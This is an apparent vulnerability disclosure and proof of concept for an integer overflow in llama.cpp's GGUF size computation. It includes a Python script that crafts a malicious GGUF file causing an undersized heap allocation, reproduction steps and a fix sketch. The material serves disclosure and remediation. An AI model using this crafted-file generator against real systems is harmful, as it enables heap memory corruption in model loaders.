PoC: Integer Overflow in ggml_nbytes() for Quantized GGUF Tensors
Vulnerability
Integer overflow in ggml_nbytes() (ggml/src/ggml.c:1273) and ggml_row_size() (ggml/src/ggml.c:1302) causes drastically undersized heap allocations when loading crafted GGUF files with quantized tensor types.
For quantized types (Q4_0 through Q8_K, all with blck_size > 1), the size computation ne[0] * type_size / blck_size overflows in the intermediate product ne[0] * type_size before the division, yielding a tiny value (e.g., 4 bytes instead of the correct ~576 PB).
All existing overflow checks in the GGUF parser pass because they validate the final result, (nelements / blck_size) * type_size, not the intermediate product.
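The wraparound can be reproduced with plain arithmetic. This sketch uses Q4_0's layout constants from ggml (type_size = 18 bytes per block, blck_size = 32 elements per block) and the crafted ne[0] from malicious.gguf:

```python
# Demonstrates the 64-bit wraparound in ggml_row_size() for the crafted ne[0].
# Constants are ggml's Q4_0 layout: 18-byte blocks of 32 elements.
NE0 = 1024819115206086208          # crafted first dimension from malicious.gguf
TYPE_SIZE, BLCK_SIZE = 18, 32      # Q4_0
U64 = 1 << 64

# Multiply-first order (as in ggml_row_size): the product wraps modulo 2^64.
unsafe = ((NE0 * TYPE_SIZE) % U64) // BLCK_SIZE

# Divide-first order (as in the parser's overflow checks): no wraparound.
safe = (NE0 // BLCK_SIZE) * TYPE_SIZE

print(unsafe)   # 4 bytes -> undersized heap allocation
print(safe)     # 576460752303423492 bytes (~576 PB)
```

The crafted ne[0] is chosen so that ne[0] * 18 lands exactly 128 past 2^64, which divides down to a 4-byte row, while the divide-first form the checks validate stays in range.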
Files
- malicious.gguf - Crafted GGUF with a Q4_0 tensor, ne[0] = 1024819115206086208
- craft_gguf.py - Script to generate malicious GGUF files (supports Q4_0 through Q8_K)
- test_load.c - Test loader demonstrating the overflow
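For reference, a minimal file like malicious.gguf can be emitted with a few struct.pack calls. This is a hypothetical re-creation of what craft_gguf.py does, not the actual script; it assumes the GGUF v3 header layout (magic, version, tensor count, KV count, tensor infos, aligned data), GGML_TYPE_Q4_0 = 2, and ggml's default alignment of 32:

```python
import struct

NE0 = 1024819115206086208  # ne[0] chosen so ne[0] * 18 wraps a 64-bit size

def craft(path="malicious.gguf"):
    name = b"poc_tensor"
    buf  = b"GGUF"                              # magic
    buf += struct.pack("<I", 3)                 # version 3
    buf += struct.pack("<Q", 1)                 # tensor_count = 1
    buf += struct.pack("<Q", 0)                 # metadata_kv_count = 0
    buf += struct.pack("<Q", len(name)) + name  # tensor name (u64 length + bytes)
    buf += struct.pack("<I", 1)                 # n_dims = 1
    buf += struct.pack("<Q", NE0)               # ne[0]: triggers the overflow
    buf += struct.pack("<I", 2)                 # type = GGML_TYPE_Q4_0 (assumed id)
    buf += struct.pack("<Q", 0)                 # tensor data offset
    buf += b"\x00" * (-len(buf) % 32)           # pad to default alignment
    buf += b"\x00" * 4                          # ggml_nbytes() claims only 4 bytes
    with open(path, "wb") as f:
        f.write(buf)
    return buf
```

Only 4 bytes of tensor data are appended because that is all the overflowed ggml_nbytes() result asks the loader to allocate and read.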
Reproduction
```sh
# Build llama.cpp with ASan
cmake -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" ..
cmake --build . --target llama-gguf

# Run
./bin/llama-gguf malicious.gguf r
```
Impact
Heap buffer overflow via undersized allocation. Affected code paths include llama-quantize, llama-imatrix, control-vector loading, and examples/gguf (all paths using no_alloc=false). This is a variant of CVE-2026-27940/CVE-2026-33298.
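The general fix pattern is to divide before multiplying and to bound-check the product. A sketch of that check in Python (mirroring the C logic, not the upstream patch; SIZE_MAX here models a 64-bit size_t):

```python
SIZE_MAX = (1 << 64) - 1  # models a 64-bit size_t

def checked_row_size(ne0, type_size, blck_size):
    # Quantized rows must be whole blocks; reject anything else up front.
    if ne0 % blck_size != 0:
        raise ValueError("ne[0] is not a multiple of blck_size")
    blocks = ne0 // blck_size
    # Dividing first keeps the intermediate small; then verify that the
    # final multiplication cannot wrap a 64-bit size.
    if type_size != 0 and blocks > SIZE_MAX // type_size:
        raise OverflowError("row size exceeds SIZE_MAX")
    return blocks * type_size

# The crafted ne[0] now yields the true ~576 PB size instead of 4 bytes,
# which the caller can then reject against the actual file size.
checked_row_size(1024819115206086208, 18, 32)
```

With this ordering the crafted tensor no longer produces a tiny allocation; it produces an honest, absurdly large size that fails any subsequent file-size or allocation-limit check.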